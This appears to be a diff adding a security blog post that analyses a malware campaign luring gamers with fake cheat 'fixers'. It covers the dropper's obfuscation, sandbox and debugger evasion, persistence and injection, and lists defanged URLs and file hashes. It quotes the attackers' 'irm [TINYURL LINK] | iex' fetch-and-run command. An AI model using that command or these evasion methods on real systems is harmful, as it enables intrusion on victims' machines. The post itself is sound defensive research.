|
| 1 | +--- |
| 2 | +title: InfoStealer Turned Ransomware |
| 3 | +categories: |
| 4 | + - Research |
| 5 | +tags: |
| 6 | + - blog |
| 7 | + - Windows |
| 8 | + - Ransomware |
| 9 | + - research |
| 10 | + - RAT |
| 11 | +date: 2025-10-16 |
| 12 | +description: Just when you thought a TA wouldn’t shift TTPs… |
| 13 | +authors: |
| 14 | +- tr4ceang3l |
| 15 | +- slavetomints |
| 16 | +researchers: |
| 17 | +- slavetomints |
| 18 | +- tr4ceang3l |
| 19 | +- likerofjazz |
| 20 | +- akithecatearedmerc |
| 21 | +image: |
| 22 | + path: /assets/img/infostealer-turned-ransomware/odisrotz-github.png |
| 23 | + alt: GitHub profile of the TAs |
| 24 | + post: false |
| 25 | +--- |
| 26 | + |
| 27 | +## Introduction |
| 28 | +On the 19th of August 2025, an individual –here-by referred to as “V”– requested help on an unnamed Cybersecurity-oriented Discord server, seeking assistance regarding the recovery of a ransomware-infected system. V had claimed to be searching for a supposed “fixer” for a cheat related to Fortnite’s Retrac. Upon further investigation and triaging of V’s system, we discovered the initial social engineering domain `hxxps[://]retracfix[.]vercel[.]app` and a corresponding YouTube video that directed victims to the aforementioned domain. The domain intends to serve malware under the guise of a “system fixer” and a patch for Project Retrac. |
| 29 | + |
| 30 | +## Initial Evaluations |
| 31 | +During the initial investigation of the campaign, researchers at DeTraced identified the campaign as being led by a group of threat actors previously associated with the WebRAT malware. We are currently tracking this group as “Betray.” Upon identifying the potential threat actors, the investigation focused on the initial malware dropper, which was extracted from the domain linked to the infection. |
| 32 | + |
| 33 | +The dropper was heavily obfuscated using various techniques, with a primary reliance on Base64 encoding and GZip compression to conceal its contents from the victim's antivirus software. The dropper’s first action upon execution is to perform hardware checks to detect the presence of common indicators for Virtual Machine (VM) environments. If these checks are successful, the malware will terminate its execution to avoid detection in a researcher’s environment. |
| 34 | + |
| 35 | +If the sandbox evasion is successful and the dropper determines it is running on a legitimate victim’s system, it proceeds to execute a series of system commands via PowerShell. The dropper directs itself to the directory `C:\ProgramData` and checks if the folder `IntelDriver` exists. If the folder is not present, the dropper creates it. Once this directory is in place, the dropper creates a new file called `windows.cmd` and writes its own contents into it. |
| 36 | + |
| 37 | +Next, the dropper reads the Base64-encoded content from any line in the `windows.cmd` file that begins with `::`, and decodes this content. The decoded data is saved to a file named `boot64x.w`. After completing this step, the dropper proceeds to establish persistence on the system by writing a VBScript to a file called `%computername%_windows64x_APZOacoasfjc.vbs`. This script is configured to run the dropper’s payload every minute by creating a Scheduled Task at the path `%AppData%\IntelDriverTask.xml`. |
| 38 | + |
| 39 | +With persistence established, the dropper continues by setting up the main payload. It again reads from `windows.cmd`, specifically extracting data from the section prefixed with `rem`. This data is copied to a file named `netstat.c`. Once `netstat.c` is successfully written, the dropper decodes the Base64-encoded content, decompresses it using Gunzip, and stores the decompressed data into a `byte[]` object. Finally, this decoded content is saved as a valid binary to the file `AarSvcw.dll`. |
| 40 | + |
| 41 | + |
| 42 | +Now that the main payload has been created, we can take a look at how the malware really operates. For the most part, the payload can be dissected with static analysis. The primary interests of the payload are its use of XOR to encrypt the strings with the single-byte key `0x5A`; using this key, we can decrypt most of the strings in the payload. As a fallback, the payload will recreate the Scheduled Task if, at some point, the file was deleted or moved to ensure persistence, the next stage is to consistently check if a debugger has been attached to the payload to which it will attempt to scramble the memory it’s in and immediately terminate itself to deter dynamic analysis, we can neutralise this check by simply patching the related function calls with `00`s. Once the persistence check has passed, the payload will proceed to extract another set of encrypted data stored within `boot64x.w` and loads it into memory, preparing itself to then inject the secondary payload into `explorer.exe`. |
| 43 | + |
| 44 | +The contents of the secondary payload are currently unknown to us as we continue to investigate the malware and the affiliated campaign’s supply chain. |
| 45 | + |
| 46 | +## Supply-chain Analysis |
| 47 | +Betray uses YouTube videos that advertise cheats and "fixer" scripts for video games, aiming to get kids and teens who are looking for cheats for video games. The videos show the user running a script in Windows Command Prompt, and then it cuts to them playing the game with the supposed benefits of the cheat. During the video, the attacker will go over the installation process and will claim that the user's antivirus software will detect it, but it is a false positive. |
| 48 | + |
| 49 | + |
| 50 | + |
| 51 | +This little bit of social engineering will be good enough to work on most users and trick the victim into interacting with the video description and following the website link, which brings them to an application hosted on Vercel. Betray has two different styles of websites. One type will have a download button for users to click on, and others will include a `irm [TINYURL LINK] | iex` command for the users to run on their systems. |
| 52 | + |
| 53 | + |
| 54 | + |
| 55 | + |
| 56 | +In both cases, the goal is to get the user to download and run the batch or PowerShell scripts that Betray uses as a dropper for their malware. |
| 57 | + |
| 58 | +Betray also includes directions on their websites for users to follow, which include having users ignore warnings from their antivirus software. |
| 59 | + |
| 60 | + |
| 61 | + |
| 62 | +Once the victim follows these steps, the malware is now on the user's system and will execute. But where does the malware come from? |
| 63 | + |
| 64 | +Inspecting the network connections when the file was downloaded revealed that it came from a release from a GitHub repository, so we went and checked it out. |
| 65 | + |
| 66 | + |
| 67 | + |
| 68 | +This is one of multiple GitHub accounts found throughout this campaign. Inspection of the repositories either turned up an empty repository with 1-2 releases or a repository full of malware. Looking into the releases answered as to where the malware came from. |
| 69 | + |
| 70 | + |
| 71 | + |
| 72 | +Betray typically hides their malware in the repository releases, and when a victim clicks on the download button, it would redirect their browser to a link such as `hxxps[://]github[.]com/odisdrotz71/thermia/releases/download/Thermia/ThermiaPredictor[.]exe`. Further inspection of the GitHub account and its other repositories led to the discovery of more malicious websites for different games, including Roblox, a popular game among kids, Stake Mines, a minesweeper casino game, and Rainbow 6 Siege, an FPS shooter game. |
| 73 | + |
| 74 | +Some of those sites looked like this: |
| 75 | + |
| 76 | + |
| 77 | + |
| 78 | + |
| 79 | + |
| 80 | + |
| 81 | +It is worth noting that none of the other buttons on the websites would work; they would redirect back to the top of the page. |
| 82 | + |
| 83 | +Betray has also leveraged GitHub Gists and `hxxps[://]filedoge[.]com` for distribution and hosting of samples; however, the `filedoge[.]com`web server has been offline since August 2025, and still is at the time of this report. |
| 84 | + |
| 85 | +## Conclusion |
| 86 | + |
| 87 | +After their stint with hiding RATs in video game cheats, the TA expanded into the malware selling scene, attempting to sell a strain known as XWorm on hxxps[://]rce[.]lol, and a batch script obfuscator on hxxps[://]betray[.]cfd. Analysis of bitcoin addresses found to be linked with the TA reveals that they never ended up receiving any payment through cryptocurrency, but they also used PayPal and Roblox gift cards. |
| 88 | + |
| 89 | +Some sites remain active as we work to take them down, but most have been categorized by search engines as unsafe to browse. |
| 90 | + |
| 91 | +## Indicators of Compromise |
| 92 | + |
| 93 | +*For the full list of IOCs and YARA rules, please check out [DeTraced-Security/detection-rules](https://github.com/DeTraced-Security/detection-rules)* |
| 94 | + |
| 95 | +### RetracFix Sample: |
| 96 | + |
| 97 | +``` |
| 98 | +Output DLL: AarSvcw.dll |
| 99 | +Intermediates: windows.cmd, boot64x.w, netstat.c (used during reconstruction) |
| 100 | +
|
| 101 | +Hash – original BAT: 38aa08661729dd3c2ae3c1fb98f85f6aa4ff5e7385b0db2a65e9e85747848ad8 |
| 102 | +Hash - boot64x.w (Obfuscated): 5b1ed346d3a84543f527aa89135037d3bf56b9343b38cbeb340811da5d9a5e43 |
| 103 | +Hash - AarSvcw.dll (Decoded): 2ce0dc292b81c72271bc9f0961271fac1e4d42b35292ce56b241174bbbeb4b46 |
| 104 | +Hash - windows.cmd (Obfuscated): 07be8edabaa28e6d4ce30c5999b22aab53eac89a43fb036cd3cec15b63b7a81c |
| 105 | +``` |
| 106 | + |
| 107 | +### Affiliated Samples |
| 108 | +``` |
| 109 | +40b461edb9b2a18bc2ed8236789c1672 2fa.bat |
| 110 | +7c92b6d50d1ab7ae24ee93d307c376f2 2faBeta.exe |
| 111 | +bc1cfd626ef0eedcdcc46036b649c406 a.exe |
| 112 | +780c2f5e127d12181b6650cededecd58 built-agbcfdxdfsdf.bat |
| 113 | +161d57257ea219a030d2c902e85c5b18 CharmBootstrapper.bat |
| 114 | +51b03d9bae4a53dd4e6210254084b806 ExecFix-2.bat |
| 115 | +18bd43b2dfad0c247148db1afdf8462e ExecFix.bat |
| 116 | +220d8aa7e914dfbd52b29d25fbf5e9cd LuckyGrid.exe |
| 117 | +c8a8bf528e1ba3ff05ddd9368efd9f82 MinesPredictor.bat |
| 118 | +b80538c353bd0a35e28b0b7c958a0689 r6_recoil.exe |
| 119 | +0ee7449dd865145498ad23c43fba4754 retrac_fixer_loader.bat |
| 120 | +da84fb352ca22ec2c94abd6f8851ea68 thermia.bat |
| 121 | +e014911669d783a05005d48e9e6e8c2c ThermiaPredictor-2.exe |
| 122 | +8060fca6ac9ce3ebceba15f66db02443 ThermiaPredictor.exe |
| 123 | +cf5005ebdc43ad19863b701025a4279b ValexUpdater.exe |
| 124 | +45bb4c63b0badff7721d2012b6482073 verbal.exe |
| 125 | +fe5c839be7074513d2be80356e807fba wcarrpt.bat |
| 126 | +``` |
0 commit comments